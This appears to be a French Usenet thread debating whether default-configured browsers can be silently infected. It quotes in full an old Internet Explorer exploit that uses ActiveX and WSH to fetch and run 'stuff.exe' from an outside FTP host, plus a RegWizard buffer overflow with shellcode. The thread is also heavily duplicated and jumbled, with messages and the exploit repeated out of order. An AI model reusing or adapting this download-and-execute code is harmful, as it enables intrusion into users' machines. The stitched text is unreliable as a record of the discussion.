"tout en ligne" (dé-responsabilisation de l'utilisateur en lui
rendant tout toujours "plus simple", moins il pense, mieux c'est....)
"Luc" <robottest.inv@netcourrier.com.invalid> a écrit dans le message
de news:4c8b4617$0$9919$426a74cc@news.free.fr...
Az Sam a écrit...
Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger
? Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)
Ce qui ne signifie pas grand chose et en tout cas pas qu'un
navigateur par défaut puisse être infecté silencieusement.
mais pas le contraire non plus on ets bien d'accord.
A moi de te demander pourquoi tu as ignoré la question pour ne
repondre qu'a l'exemple ;-)
Je ne prends pas la mouche, je note seulement que tu as bien "oublié"
l'essentiel de mon intervention et c'est pourquoi je l'ai cité.
si on joue a ca on a pas fini... Passons.
C'est évident que si tu prends pour principe puisse être paramétré
n'importe comment, tu peux prévoir n'importe quelle avanie, et donc,
une fois que tu as dis ça, tu n'as rien dit. J'ai bien toujours
précisé comme condition minimale "navigateur paramétré par défaut".
et moi je te repete : ton cas, outre que tu ne le demontre pas plus
que je ne viens de te le contredire, ne s'applique pas souvent dans
la realité : des naviguateurs mal configurés, ca court les bureaux et
ca court le net...
Exemple celui de la CAF
La CAF infecte silencieusement les navigateurs paramétrés par
défaut. Ça fout la trouille.
ah ben voila.... j'ai pourtant pris la peine de reposter derriere :-(
Adultes responsable disais tu, moi je suis d'accord hein
Mais c'est toi qui l'affirmes mais ce n'est pas vrai (je ne vais pas
reciter la réponse que je t'ai faite à ce sujet, n'est-ce pas ?)
oui j'affirme que les naviguateurs, notement Ie dans notre echange,
ne sont pas toujours configurés avec les options par defaut, car je
croise le cas TRES regulierment dans ma pratique quotidienne.
et quoi qu'il en soit, il n'en reste pas moins vrai qu'un navigateur
par défaut ne peut être vérolé silencieusement sans la complicité
active de l'utilisateur.
ca je me garderais bien de l'affirmer quand meme à defaut de ne
pouvoir dans l'instant te le montrer.
Non, ce n'est pas du tout comparable. L'UAC est agaçant pour
l'utilisateur un peu "geek" qui installe, désintalle, fouille
beaucoup est trop souvent mis en garde par ce contrôle du compte
utilisateur. L'utilisateur "de base" qui se sert de son PC comme
d'un outil ne verra qu'une poignée de rappels de l'UAC au début de
l'installation de son PC quand il installera ses logiciels préférés,
il n'aura pas le temps de s'agacer, par la suite, il n'en verra plus.
Pour ce qui concerne les paramètres de sécurité des navigateurs, le
niveau par défaut permet d'aller et de voir ce qu'on veut sur la
toile dans 99,99% des lieux, l'utilisateur "de base" (je n'aime pas
trop cette expression mais bon, on se comprend) n'a jamais lieu
d'aller y farfouiller.
Mais le "geek" (et meme le non geek, si dans geek on met plus qu'un
neurone servant a jouir) fera aussi ce genre de modification pour
s'eviter des messages d'avertissements de script ou d'activeX ou de
page securisée/non securisée dont il peut se passer du fait de sa
bonne maitrise du net et de sa connaissance approfondie des risques
.(ce geek là, affirme par exemple qu'il surf sans AV, lui)
[note : attention, je ne dis pas que tu es celui la, je rebondis
seulement sur ta propre affirmation que certains reprennent ensuite
pour eux]
C'est dommage car tu aurais noté, j'en suis sûr le site en question
et enfin mon attente de plus de dix ans serait rompue ! ;-)
J'ai bien ca, mais c'est tres vieux donc ca ne fonctionne plus (IE4) :
///////////////////////////////////////////////
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<script>
scr.Path="C:\Netmonn.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('command
/c echo ftp -v -i -s:c:\\repair.zip
ftp.respublica.fr>>c:\\repair.bat',true,1);wsh.Run('command /c echo
stuff.exe>>c:\\repair.bat',true,1);wsh.Run('command /c echo deltree
/y c:\\repair.zip>>c:\\repair.bat',true,1);wsh.Run('command /c
echo deltree /y
c:\\Netmonn.hta>>c:\\repair.bat',true,1);wsh.Run('command /c echo
deltree /y
c:\\repair.bat>>c:\\repair.bat',true,1);wsh.Run('command /c echo
kaliko>> c:\\Repair.zip',false,6);wsh.Run('command /c echo ZorkZ>>
c:\\Repair.zip',false,6);wsh.Run('command /c echo lcd
c:\\windows>> c:\\Repair.zip',false,6);wsh.Run('command /c echo
binary>> c:\\Repair.zip',false,6);wsh.Run('command /c echo get
stuff.exe>> c:\\Repair.zip',false,6);wsh.Run('command /c echo
quit>>c:\\Repair.zip',false,6);wsh.Run('c:\\repair.bat',false,6)</"+"SCRIPT>";scr.write();
</script> <object
classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object> <script language="VbScript" > expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "mshta c:Netmonn.hta"
RegWizObj.InvokeRegWizard(expstr)
////////////////////////////////////////////////////////////////////////////
Les hta n'impliquaient pas de mise en garde de la part du systeme a
cette epoque.
Personnellement, j'aime bien la méthode "éducative" plutôt
qu'"interdictive".
moi aussi, mais il y a de nombreux obstacles internes : semantiques,
cognitifs et parfois meme organiques.
et externes : pression comerciale, ingienierie sociale,
complexification.
Je *montre* l'ennemi en face, on combat mieux son ennemi quand on le
connaît. J'ai une bordée de mails avec PJ vérolées, je montre leur
tronche, leurs caractérisques. Ce n'est pas bien difficile de les
repérer avec leurs gros sabots. On voit très bien aussi que le
danger, c'est n'est pas de voir, mais d'installer (comme pour le
surf en somme, on y revient ! ;-) ), seule la PJ est infectante si
on l'installe et ça, c'est l'utilisateur qui peut le faire, personne
d'autre.
pour le mail c'est toujours vrai.. quoique là aussi visionner avec
OE5 dans le panneau de visualistaion des mail en html pouvait
permettre l'execution d'un script. Le hta ci dessus etait d'ailleurs
diffusé comme cela si je me souviens bien.
De meme que les reglage "par defaut" du courielleur. Ca lui a valu
une sale reputation qui lui colle encore au basque au point que MS
l'a renommé en Windows Mail sur Vista.
On pourrait aussi soulever les cas des pdf, des jpg, des flash...
forgés.
On peut montrer aussi les dangers du surf, j'ai déjà parlé par
exemple des visites en des lieux malfamés qui proposent des
logiciels promettant des photos de Haris Pilton à poil devant Pris,
on trouve aussi assez facilement des liens qui t'annoncent tout de
go que ton PC est pourri de centaines de conchonneries et te
proposent, des pseudo antivirus qui sont de vrais rogues, etc, etc.
les rogues, oui ca pullule.
Bref, en une heure tout au plus, on peut montrer à une personne
responsable les pièges tellement facile à éviter que ça vaut parfois
mieux que la fausse impression de sécurité que donne la foison
d'outils de sécurité qui ne fait que baisser le niveau de vigilance
et le bon sens de l'utilisateur.
Le seul bon sens n'est pas suffisant.
La tromperie se sophistique
autant que les langages (HML5 bientôt... brrr) se complexifient.
Sans compter les réseaux sociaux (lit de l'ingienierie sociale) ou le
"tout en ligne" (dé-responsabilisation de l'utilisateur en lui
rendant tout toujours "plus simple", moins il pense, mieux c'est....)
"Luc" a écrit dans le message
de news:4c8b4617$0$9919$Az Sam a écrit...Ah ben soyons clair : annoncent ils des choses inexactes dans le but
d'inquitéter et vendre leurs produits, ou annoncent ils des
phenomenes reels contre lesquels leurs outils proposent de proteger
? Car si tu as regardé le petit topo que j'ai mis en lien il y est
clairement annoncé : "Sometimes you need only access a webpage with
a flawed browser" Tout ets dans le Flawed bien sur... (defectueux)
Ce qui ne signifie pas grand chose et en tout cas pas qu'un
navigateur par défaut puisse être infecté silencieusement.
mais pas le contraire non plus on ets bien d'accord.
A moi de te demander pourquoi tu as ignoré la question pour ne
repondre qu'a l'exemple ;-)
Je ne prends pas la mouche, je note seulement que tu as bien "oublié"
l'essentiel de mon intervention et c'est pourquoi je l'ai cité.
si on joue a ca on a pas fini... Passons.
C'est évident que si tu prends pour principe puisse être paramétré
n'importe comment, tu peux prévoir n'importe quelle avanie, et donc,
une fois que tu as dis ça, tu n'as rien dit. J'ai bien toujours
précisé comme condition minimale "navigateur paramétré par défaut".
et moi je te repete : ton cas, outre que tu ne le demontre pas plus
que je ne viens de te le contredire, ne s'applique pas souvent dans
la realité : des naviguateurs mal configurés, ca court les bureaux et
ca court le net...
Exemple celui de la CAF
La CAF infecte silencieusement les navigateurs paramétrés par
défaut. Ça fout la trouille.
ah ben voila.... j'ai pourtant pris la peine de reposter derriere :-(
Adultes responsable disais tu, moi je suis d'accord hein
Mais c'est toi qui l'affirmes mais ce n'est pas vrai (je ne vais pas
reciter la réponse que je t'ai faite à ce sujet, n'est-ce pas ?)
oui j'affirme que les naviguateurs, notement Ie dans notre echange,
ne sont pas toujours configurés avec les options par defaut, car je
croise le cas TRES regulierment dans ma pratique quotidienne.
et quoi qu'il en soit, il n'en reste pas moins vrai qu'un navigateur
par défaut ne peut être vérolé silencieusement sans la complicité
active de l'utilisateur.
ca je me garderais bien de l'affirmer quand meme à defaut de ne
pouvoir dans l'instant te le montrer.
Non, ce n'est pas du tout comparable. L'UAC est agaçant pour
l'utilisateur un peu "geek" qui installe, désintalle, fouille
beaucoup est trop souvent mis en garde par ce contrôle du compte
utilisateur. L'utilisateur "de base" qui se sert de son PC comme
d'un outil ne verra qu'une poignée de rappels de l'UAC au début de
l'installation de son PC quand il installera ses logiciels préférés,
il n'aura pas le temps de s'agacer, par la suite, il n'en verra plus.
Pour ce qui concerne les paramètres de sécurité des navigateurs, le
niveau par défaut permet d'aller et de voir ce qu'on veut sur la
toile dans 99,99% des lieux, l'utilisateur "de base" (je n'aime pas
trop cette expression mais bon, on se comprend) n'a jamais lieu
d'aller y farfouiller.
Mais le "geek" (et meme le non geek, si dans geek on met plus qu'un
neurone servant a jouir) fera aussi ce genre de modification pour
s'eviter des messages d'avertissements de script ou d'activeX ou de
page securisée/non securisée dont il peut se passer du fait de sa
bonne maitrise du net et de sa connaissance approfondie des risques
.(ce geek là, affirme par exemple qu'il surf sans AV, lui)
[note : attention, je ne dis pas que tu es celui la, je rebondis
seulement sur ta propre affirmation que certains reprennent ensuite
pour eux]C'est dommage car tu aurais noté, j'en suis sûr le site en question
et enfin mon attente de plus de dix ans serait rompue ! ;-)
J'ai bien ca, mais c'est tres vieux donc ca ne fonctionne plus (IE4) :
///////////////////////////////////////////////
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<script>
scr.Path="C:Netmonn.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('command
/c echo ftp -v -i -s:c:\repair.zip
ftp.respublica.fr>>c:\repair.bat',true,1);wsh.Run('command /c echo
stuff.exe>>c:\repair.bat',true,1);wsh.Run('command /c echo deltree
/y c:\repair.zip>>c:\repair.bat',true,1);wsh.Run('command /c
echo deltree /y
c:\Netmonn.hta>>c:\repair.bat',true,1);wsh.Run('command /c echo
deltree /y
c:\repair.bat>>c:\repair.bat',true,1);wsh.Run('command /c echo
kaliko>> c:\Repair.zip',false,6);wsh.Run('command /c echo ZorkZ>>
c:\Repair.zip',false,6);wsh.Run('command /c echo lcd
c:\windows>> c:\Repair.zip',false,6);wsh.Run('command /c echo
binary>> c:\Repair.zip',false,6);wsh.Run('command /c echo get
stuff.exe>> c:\Repair.zip',false,6);wsh.Run('command /c echo
quit>>c:\Repair.zip',false,6);wsh.Run('c:\repair.bat',false,6)</"+"SCRIPT>";scr.write();
</script> <object
classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object> <script language="VbScript" > expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "mshta c:Netmonn.hta"
RegWizObj.InvokeRegWizard(expstr)
////////////////////////////////////////////////////////////////////////////
Les hta n'impliquaient pas de mise en garde de la part du systeme a
cette epoque.Personnellement, j'aime bien la méthode "éducative" plutôt
qu'"interdictive".
moi aussi, mais il y a de nombreux obstacles internes : semantiques,
cognitifs et parfois meme organiques.
et externes : pression comerciale, ingienierie sociale,
complexification.Je *montre* l'ennemi en face, on combat mieux son ennemi quand on le
connaît. J'ai une bordée de mails avec PJ vérolées, je montre leur
tronche, leurs caractérisques. Ce n'est pas bien difficile de les
repérer avec leurs gros sabots. On voit très bien aussi que le
danger, c'est n'est pas de voir, mais d'installer (comme pour le
surf en somme, on y revient ! ;-) ), seule la PJ est infectante si
on l'installe et ça, c'est l'utilisateur qui peut le faire, personne
d'autre.
pour le mail c'est toujours vrai.. quoique là aussi visionner avec
OE5 dans le panneau de visualistaion des mail en html pouvait
permettre l'execution d'un script. Le hta ci dessus etait d'ailleurs
diffusé comme cela si je me souviens bien.
De meme que les reglage "par defaut" du courielleur. Ca lui a valu
une sale reputation qui lui colle encore au basque au point que MS
l'a renommé en Windows Mail sur Vista.
On pourrait aussi soulever les cas des pdf, des jpg, des flash...
forgés.On peut montrer aussi les dangers du surf, j'ai déjà parlé par
exemple des visites en des lieux malfamés qui proposent des
logiciels promettant des photos de Haris Pilton à poil devant Pris,
on trouve aussi assez facilement des liens qui t'annoncent tout de
go que ton PC est pourri de centaines de conchonneries et te
proposent, des pseudo antivirus qui sont de vrais rogues, etc, etc.
les rogues, oui ca pullule.Bref, en une heure tout au plus, on peut montrer à une personne
responsable les pièges tellement facile à éviter que ça vaut parfois
mieux que la fausse impression de sécurité que donne la foison
d'outils de sécurité qui ne fait que baisser le niveau de vigilance
et le bon sens de l'utilisateur.
Le seul bon sens n'est pas suffisant.
La tromperie se sophistique
autant que les langages (HML5 bientôt... brrr) se complexifient.
Sans compter les réseaux sociaux (lit de l'ingienierie sociale) ou le
"tout en ligne" (dé-responsabilisation de l'utilisateur en lui
rendant tout toujours "plus simple", moins il pense, mieux c'est....)
Amusant, il semble qu'Avast Gratuit 5.0.677 avec la base 100910-1 détecte
un virus dans ce message et ses réponses.
Amusant, il semble qu'Avast Gratuit 5.0.677 avec la base 100910-1 détecte
un virus dans ce message et ses réponses.
Amusant, il semble qu'Avast Gratuit 5.0.677 avec la base 100910-1 détecte
un virus dans ce message et ses réponses.
??
Tout au plus qu'ils prêchent pour leur paroisse. Rien de plus normal au
demeurant, mais c'est pour bien mettre en perspective le contenu du lien.
Ben si c'est toi qui "oublie", tu passes plus facile forcément ! ;-)
Mais non, c'est inexact... mais bon, comme tu dis, on peut jouer à ça
pendant des lustres.
??? C'est toi qui donne l'exemple de la CAF
Eh oui
Je ne vais pas relancer sur le proportion relative navigateurs paramétrer
par défaut ou non, on va encore tourner en rond mais, il restera toujours
vrai que dans le cas d'un paramétrage par défaut, on ne peut pas être
infecté silencieusement.
Et il ne faut surtout pas affirmer le contraire quand *un seul* exemple de
lien infectant donnerait raison à cette thèse alors que pour l'inverse, il
faudrait citer tous les liens non infectant ce qui serait impossible.
IE4 ! Tu remontes au siècle dernier !
No comment.
Avec OE5, non, avec OE4 oui... mais bon, même remarque que ci-dessus,
siècle dernier, tout ça...
Ouais enfin, quand on veut salir LE mauvais objet par excellence, leader
sur le marché, produit de Microsoft... il est l'objet de toutes les
calomnies, il en reste toujours quelque chose, parît même qu'il mange les
petits enfants.
Alors je crois comprendre qu'on est d'accord sur ce point : la pédagogie
qui mise (aussi) sur la connaissance et l'intelligence de l'utilisateur
valent mieux que sur le "dormez en paix braves gens, je pense pour vous...
et achetez mes produits de sécurité". Les ceintures, bretelles, airbags...
de sécurité ne dispensent pas les conducteurs d'être prudents, attentifs
et conscients des risques.
??
Tout au plus qu'ils prêchent pour leur paroisse. Rien de plus normal au
demeurant, mais c'est pour bien mettre en perspective le contenu du lien.
Ben si c'est toi qui "oublie", tu passes plus facile forcément ! ;-)
Mais non, c'est inexact... mais bon, comme tu dis, on peut jouer à ça
pendant des lustres.
??? C'est toi qui donne l'exemple de la CAF
Eh oui
Je ne vais pas relancer sur le proportion relative navigateurs paramétrer
par défaut ou non, on va encore tourner en rond mais, il restera toujours
vrai que dans le cas d'un paramétrage par défaut, on ne peut pas être
infecté silencieusement.
Et il ne faut surtout pas affirmer le contraire quand *un seul* exemple de
lien infectant donnerait raison à cette thèse alors que pour l'inverse, il
faudrait citer tous les liens non infectant ce qui serait impossible.
IE4 ! Tu remontes au siècle dernier !
No comment.
Avec OE5, non, avec OE4 oui... mais bon, même remarque que ci-dessus,
siècle dernier, tout ça...
Ouais enfin, quand on veut salir LE mauvais objet par excellence, leader
sur le marché, produit de Microsoft... il est l'objet de toutes les
calomnies, il en reste toujours quelque chose, parît même qu'il mange les
petits enfants.
Alors je crois comprendre qu'on est d'accord sur ce point : la pédagogie
qui mise (aussi) sur la connaissance et l'intelligence de l'utilisateur
valent mieux que sur le "dormez en paix braves gens, je pense pour vous...
et achetez mes produits de sécurité". Les ceintures, bretelles, airbags...
de sécurité ne dispensent pas les conducteurs d'être prudents, attentifs
et conscients des risques.
??
Tout au plus qu'ils prêchent pour leur paroisse. Rien de plus normal au
demeurant, mais c'est pour bien mettre en perspective le contenu du lien.
Ben si c'est toi qui "oublie", tu passes plus facile forcément ! ;-)
Mais non, c'est inexact... mais bon, comme tu dis, on peut jouer à ça
pendant des lustres.
??? C'est toi qui donne l'exemple de la CAF
Eh oui
Je ne vais pas relancer sur le proportion relative navigateurs paramétrer
par défaut ou non, on va encore tourner en rond mais, il restera toujours
vrai que dans le cas d'un paramétrage par défaut, on ne peut pas être
infecté silencieusement.
Et il ne faut surtout pas affirmer le contraire quand *un seul* exemple de
lien infectant donnerait raison à cette thèse alors que pour l'inverse, il
faudrait citer tous les liens non infectant ce qui serait impossible.
IE4 ! Tu remontes au siècle dernier !
No comment.
Avec OE5, non, avec OE4 oui... mais bon, même remarque que ci-dessus,
siècle dernier, tout ça...
Ouais enfin, quand on veut salir LE mauvais objet par excellence, leader
sur le marché, produit de Microsoft... il est l'objet de toutes les
calomnies, il en reste toujours quelque chose, parît même qu'il mange les
petits enfants.
Alors je crois comprendre qu'on est d'accord sur ce point : la pédagogie
qui mise (aussi) sur la connaissance et l'intelligence de l'utilisateur
valent mieux que sur le "dormez en paix braves gens, je pense pour vous...
et achetez mes produits de sécurité". Les ceintures, bretelles, airbags...
de sécurité ne dispensent pas les conducteurs d'être prudents, attentifs
et conscients des risques.
Je te trouve un esprit polemique a agir de la sorte. Bon on est sur
Usenet... C'est monnaie courante apres tout.
Je te trouve un esprit polemique a agir de la sorte. Bon on est sur
Usenet... C'est monnaie courante apres tout.
Je te trouve un esprit polemique a agir de la sorte. Bon on est sur
Usenet... C'est monnaie courante apres tout.
il faudrait *aussi* definir les conditions de l'infection ou de la non
infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.
il faudrait *aussi* definir les conditions de l'infection ou de la non
infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.
il faudrait *aussi* definir les conditions de l'infection ou de la non
infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.
Az Sam a écrit...il faudrait *aussi* definir les conditions de l'infection ou de la non
infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.
C'est sûr que si on ne s'entend pas sur le sens de "par défaut" que j'ai
posée comme condition incontournable depuis le début, on peut discutailler
pendant des lustres en vain. Par défaut, c'est le paramétrage du logiciel
proposé à la première ouverture du logiciel et plus particulièrement dans
la discussion qui nous occupe pour tout ce qui concerne la sécurité. Pour
IE, par exemple, il y a un bouton 'Niveau par défaut' dans les options de
sécurité. Dispense-moi, s'il te plaît de devoir préciser tous les
paramètres que recouvre ce niveau.
Maintenant, faut tout relire sous cet éclairage.
Az Sam a écrit...
il faudrait *aussi* definir les conditions de l'infection ou de la non
infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.
C'est sûr que si on ne s'entend pas sur le sens de "par défaut" que j'ai
posée comme condition incontournable depuis le début, on peut discutailler
pendant des lustres en vain. Par défaut, c'est le paramétrage du logiciel
proposé à la première ouverture du logiciel et plus particulièrement dans
la discussion qui nous occupe pour tout ce qui concerne la sécurité. Pour
IE, par exemple, il y a un bouton 'Niveau par défaut' dans les options de
sécurité. Dispense-moi, s'il te plaît de devoir préciser tous les
paramètres que recouvre ce niveau.
Maintenant, faut tout relire sous cet éclairage.
Az Sam a écrit...il faudrait *aussi* definir les conditions de l'infection ou de la non
infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.
C'est sûr que si on ne s'entend pas sur le sens de "par défaut" que j'ai
posée comme condition incontournable depuis le début, on peut discutailler
pendant des lustres en vain. Par défaut, c'est le paramétrage du logiciel
proposé à la première ouverture du logiciel et plus particulièrement dans
la discussion qui nous occupe pour tout ce qui concerne la sécurité. Pour
IE, par exemple, il y a un bouton 'Niveau par défaut' dans les options de
sécurité. Dispense-moi, s'il te plaît de devoir préciser tous les
paramètres que recouvre ce niveau.
Maintenant, faut tout relire sous cet éclairage.
"Luc" a écrit dans le message
de news:4c8ba28e$0$8904$Az Sam a écrit...il faudrait *aussi* definir les conditions de l'infection ou de la
non infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.
C'est sûr que si on ne s'entend pas sur le sens de "par défaut" que
j'ai posée comme condition incontournable depuis le début, on peut
discutailler pendant des lustres en vain. Par défaut, c'est le
paramétrage du logiciel proposé à la première ouverture du logiciel
et plus particulièrement dans la discussion qui nous occupe pour
tout ce qui concerne la sécurité. Pour IE, par exemple, il y a un
bouton 'Niveau par défaut' dans les options de sécurité.
Dispense-moi, s'il te plaît de devoir préciser tous les paramètres
que recouvre ce niveau. Maintenant, faut tout relire sous cet éclairage.
ben oui mais comme je le disais, ce paramétrage par défaut n'est pas
le même d'une version a l'autre et d'une mise a jour a l'autre...
Disons, qu'au départ, tu ne l'a pas précisé
et je l'ai entendu comme
tu le dis maintenant c'est a dire "niveau par défaut" sans plus se
préoccuper de ce en quoi ce défaut consiste.
Dans cette situation, je redis que je rencontre très fréquemment des
machines ou ce niveau est modifié.
Parfois sur les conseils de MS :
http://www.microsoft.com/france/technet/security/bulletin/MS10-042.mspx
ou
http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx)
(A noter que ces pages ont depuis été mises a jour et clôturée, au
départ le conseil était "désactivez en attendant le patch de Maj.")
Mais tu me soutiens que ce n'est pas vrai alors bon, je suis bien
oblige de te demander de détailler un peu
Enfin, bref, je pense que l'on ne va pas y arriver, ca part en
couille,
on en est a se demander mutuellement de se justifier, la
conversation ne peut tenir sereinement je pense.
"Luc" <robottest.inv@netcourrier.com.invalid> a écrit dans le message
de news:4c8ba28e$0$8904$426a74cc@news.free.fr...
Az Sam a écrit...
il faudrait *aussi* definir les conditions de l'infection ou de la
non infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.
C'est sûr que si on ne s'entend pas sur le sens de "par défaut" que
j'ai posée comme condition incontournable depuis le début, on peut
discutailler pendant des lustres en vain. Par défaut, c'est le
paramétrage du logiciel proposé à la première ouverture du logiciel
et plus particulièrement dans la discussion qui nous occupe pour
tout ce qui concerne la sécurité. Pour IE, par exemple, il y a un
bouton 'Niveau par défaut' dans les options de sécurité.
Dispense-moi, s'il te plaît de devoir préciser tous les paramètres
que recouvre ce niveau. Maintenant, faut tout relire sous cet éclairage.
ben oui mais comme je le disais, ce paramétrage par défaut n'est pas
le même d'une version a l'autre et d'une mise a jour a l'autre...
Disons, qu'au départ, tu ne l'a pas précisé
et je l'ai entendu comme
tu le dis maintenant c'est a dire "niveau par défaut" sans plus se
préoccuper de ce en quoi ce défaut consiste.
Dans cette situation, je redis que je rencontre très fréquemment des
machines ou ce niveau est modifié.
Parfois sur les conseils de MS :
http://www.microsoft.com/france/technet/security/bulletin/MS10-042.mspx
ou
http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx)
(A noter que ces pages ont depuis été mises a jour et clôturée, au
départ le conseil était "désactivez en attendant le patch de Maj.")
Mais tu me soutiens que ce n'est pas vrai alors bon, je suis bien
oblige de te demander de détailler un peu
Enfin, bref, je pense que l'on ne va pas y arriver, ca part en
couille,
on en est a se demander mutuellement de se justifier, la
conversation ne peut tenir sereinement je pense.
"Luc" a écrit dans le message
de news:4c8ba28e$0$8904$Az Sam a écrit...il faudrait *aussi* definir les conditions de l'infection ou de la
non infection. Car tu dis "par defaut", mais tu ne precise pas quels
defauts.
C'est sûr que si on ne s'entend pas sur le sens de "par défaut" que
j'ai posée comme condition incontournable depuis le début, on peut
discutailler pendant des lustres en vain. Par défaut, c'est le
paramétrage du logiciel proposé à la première ouverture du logiciel
et plus particulièrement dans la discussion qui nous occupe pour
tout ce qui concerne la sécurité. Pour IE, par exemple, il y a un
bouton 'Niveau par défaut' dans les options de sécurité.
Dispense-moi, s'il te plaît de devoir préciser tous les paramètres
que recouvre ce niveau. Maintenant, faut tout relire sous cet éclairage.
ben oui mais comme je le disais, ce paramétrage par défaut n'est pas
le même d'une version a l'autre et d'une mise a jour a l'autre...
Disons, qu'au départ, tu ne l'a pas précisé
et je l'ai entendu comme
tu le dis maintenant c'est a dire "niveau par défaut" sans plus se
préoccuper de ce en quoi ce défaut consiste.
Dans cette situation, je redis que je rencontre très fréquemment des
machines ou ce niveau est modifié.
Parfois sur les conseils de MS :
http://www.microsoft.com/france/technet/security/bulletin/MS10-042.mspx
ou
http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx)
(A noter que ces pages ont depuis été mises a jour et clôturée, au
départ le conseil était "désactivez en attendant le patch de Maj.")
Mais tu me soutiens que ce n'est pas vrai alors bon, je suis bien
oblige de te demander de détailler un peu
Enfin, bref, je pense que l'on ne va pas y arriver, ca part en
couille,
on en est a se demander mutuellement de se justifier, la
conversation ne peut tenir sereinement je pense.